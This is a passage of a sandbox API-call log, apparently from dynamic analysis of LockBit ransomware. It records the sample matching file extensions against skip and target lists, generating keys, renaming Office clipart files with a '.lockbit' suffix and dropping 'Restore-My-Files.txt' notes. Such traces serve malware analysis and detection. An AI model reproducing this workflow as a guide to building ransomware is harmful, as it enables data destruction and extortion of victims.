(lpString1=".dbv", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.970] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.970] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.970] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.lockbit") returned 72 [0113.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00306_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.970] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.970] malloc (_Size=0x40068) returned 0x3d70450 [0113.971] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=46814) returned 1 [0113.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.972] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.977] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.977] malloc (_Size=0xa6) returned 0x77d7a8 [0113.977] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.981] free (_Block=0x77d7a8) [0113.981] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.981] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.981] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.981] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2c8c800, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2c8c800, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00336_.WMF", cAlternateFileName="")) returned 1 [0113.981] lstrcmpiW (lpString1=".", lpString2="FD00336_.WMF") returned -1 [0113.981] lstrcmpiW (lpString1="..", lpString2="FD00336_.WMF") returned -1 [0113.981] PathFindExtensionW (pszPath="FD00336_.WMF") returned=".WMF" [0113.981] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.981] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.981] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.981] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.982] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.982] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.983] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00336_.WMF") returned 1 [0113.983] lstrcmpiW (lpString1="ntldr", lpString2="FD00336_.WMF") returned 1 [0113.983] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00336_.WMF") returned 1 [0113.983] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00336_.WMF") returned -1 [0113.983] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00336_.WMF") returned -1 [0113.983] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00336_.WMF") returned 1 [0113.983] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00336_.WMF") returned 1 [0113.983] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.984] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF") returned=".WMF" [0113.984] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.984] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.984] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.985] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.985] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.985] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.985] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.985] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.985] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.lockbit") returned 72 [0113.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00336_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.985] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.986] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.986] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=6068) returned 1 [0113.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.987] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.993] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.993] malloc (_Size=0xa6) returned 0x77d7a8 [0113.993] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.993] free (_Block=0x77d7a8) [0113.994] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00336_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.994] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.994] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf943800, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaf943800, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xfea, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00361_.WMF", cAlternateFileName="")) returned 1 [0113.994] lstrcmpiW (lpString1=".", lpString2="FD00361_.WMF") returned -1 [0113.994] lstrcmpiW (lpString1="..", lpString2="FD00361_.WMF") returned -1 [0113.994] PathFindExtensionW (pszPath="FD00361_.WMF") returned=".WMF" [0113.994] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.994] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.995] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.995] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.996] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00361_.WMF") returned 1 [0113.996] lstrcmpiW (lpString1="ntldr", lpString2="FD00361_.WMF") returned 1 [0113.996] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00361_.WMF") returned 1 [0113.996] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00361_.WMF") returned -1 [0113.997] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00361_.WMF") returned -1 [0113.997] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00361_.WMF") returned 1 [0113.997] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00361_.WMF") returned 1 [0113.997] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.997] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF") returned=".WMF" [0113.997] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.997] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.997] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.998] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.998] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.lockbit") returned 72 [0113.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00361_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0113.999] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.999] malloc (_Size=0x40068) returned 0x3db04c0 [0113.999] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=4074) returned 1 [0113.999] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0114.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0114.000] ReadFile (in: hFile=0x340, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.007] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.007] malloc (_Size=0xa6) returned 0x77d7a8 [0114.007] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.008] free (_Block=0x77d7a8) [0114.008] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00361_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.008] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.008] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6bcf00, ftCreationTime.dwHighDateTime=0x1bd4b2d, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfb6bcf00, ftLastWriteTime.dwHighDateTime=0x1bd4b2d, nFileSizeHigh=0x0, nFileSizeLow=0x2168, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00369_.WMF", cAlternateFileName="")) returned 1 [0114.008] lstrcmpiW (lpString1=".", lpString2="FD00369_.WMF") returned -1 [0114.008] lstrcmpiW (lpString1="..", lpString2="FD00369_.WMF") returned -1 [0114.008] PathFindExtensionW (pszPath="FD00369_.WMF") returned=".WMF" [0114.008] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.009] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.009] 